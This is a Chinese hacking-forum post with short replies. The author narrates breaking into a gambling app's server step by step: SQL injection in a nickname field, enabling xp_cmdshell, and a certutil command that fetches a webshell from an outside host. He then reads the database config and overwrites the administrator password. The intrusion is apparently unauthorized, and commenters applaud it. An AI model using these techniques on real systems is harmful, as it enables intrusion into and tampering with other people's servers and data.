搜索
    Hi~登录注册
    查看: 259|回复: 3
    收起左侧

    对非法彩票站的一次测试

    [复制链接]

    3

    主题

    0

    精华

    2 小时

    在线时间

    新手上路

    Rank: 1

    积分
    3
    发表于 2019-6-16 10:02:22 | 显示全部楼层 |阅读模式
    抱着娃哼着儿歌哄她睡。微信上10几年的老鸡友发了串账号密码让我去苹果商城app上下载个叫“xx代购”的程序。我都买了好几个月的宝宝尿片和奶粉了再说搞代购它犯法啊!和他说了几句叫我下载好登陆就知道了。咱也不敢多问只能把娃丢一边下好程序输入账号密码原来是个彩票站。这难道换个马甲苹果商城都不审核内容了吗?



    QQ截图20190616095601.png QQ截图20190616095624.png
    配置好burp打开程序进行抓包把抓取的url丢http://www.yunsee.cn/进行web指纹识别。
    指纹识别对php站点比较友好目标是aspx误报严重。
    主要是看目标服务器ip和idc地址针对后期的一些操作。
    这里可以看出是国内阿里云服务器。


    QQ截图20190616095715.png
    QQ截图20190616095737.png
    拨通穷逼狗100元人民币大半年低配版阿里云vpn一边扫目录一边AWV扫描漏洞,
    (注:如果是香港,新加坡请选择当地区服务器)喝了几杯水回来看只扫到了后台目录,AWV扫描也没什么好结果。
    QQ截图20190616095815.png
    QQ截图20190616095839.png
    后台又没密码,用万能密码登陆和burp跑了一圈字典都没跑出密码,测试了登陆框也没注入。
    只能先把注意力放前台这里了。先用chrome插件修改成手机User-Agent。
    登陆前台账号一边开启burp挂好代理浏览,一边对带入的参数进行xss和sql注入测试。
    在一大堆url里当测试到修改用户昵称处时nick_name参数报错注入。




    QQ截图20190616095920.png
    QQ截图20190616095943.png
    看爆错信息老鸟都可以猜到可能是sa了,sqlmap对mssql2008上xp_cmdshell不怎么友好对于aspx站点我都是先转发数据到本地再操作。
    这里用叉叉兵前辈的adv转发数据换用穿山甲。
    由于目标是iis7.5在你输入一个不存在的目录时可以直接爆出web文件路径。
    恢复完xp_cmdshell执行命令certutil.exe -urlcache -split -f http://xx/sqlyyy.txt x:\xx.aspx下载了个只有sql语句的木马文件,主要还是阿里云各类报警和短信提醒怕了。
    所以只要简单能操作sql语句足已了。
    type web.config数据库配置信息后连接成功。


    QQ截图20190616100032.png
    QQ截图20190616100058.png
    由于还没下源码后台密码破解不出,查询了下自己的pass值和salt字段update修改管理处登陆截图交差。
    喂奶,换尿片真是累啊。
    我得继续抱我的小棉袄去了。
























    QQ截图20190616100144.png
    。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。




















    上一篇:方程式smb、rdp远程溢出图形化版
    下一篇:渗透测试中实用的谷歌浏览器插件

    评分

    参与人数 1网币 +5 收起 理由
    人生需奔放, + 5 宇哥真男人,还是宇哥姿势多

    查看全部评分

    回复

    使用道具 举报

    66

    主题

    2

    精华

    28 小时

    在线时间

    注册会员

    Rank: 2

    积分
    115
    发表于 2019-6-16 10:04:27 | 显示全部楼层
    宇哥给力嗷!向劳模学习!
    回复 支持 反对

    使用道具 举报

    0

    主题

    0

    精华

    10 小时

    在线时间

    荣誉会员

    Rank: 8Rank: 8

    积分
    9
    发表于 2019-6-19 20:08:00 | 显示全部楼层
    厉害  很给力 支持了
    回复 支持 反对

    使用道具 举报

    0

    主题

    0

    精华

    2 小时

    在线时间

    新手上路

    Rank: 1

    积分
    2
    发表于 2019-6-29 14:08:30 | 显示全部楼层
    现在这些人都是各种伪装。
    回复 支持 反对

    使用道具 举报

    游客
    回复
    您需要登录后才可以回帖 登录 | 获取账号

    快速回复 返回顶部 返回列表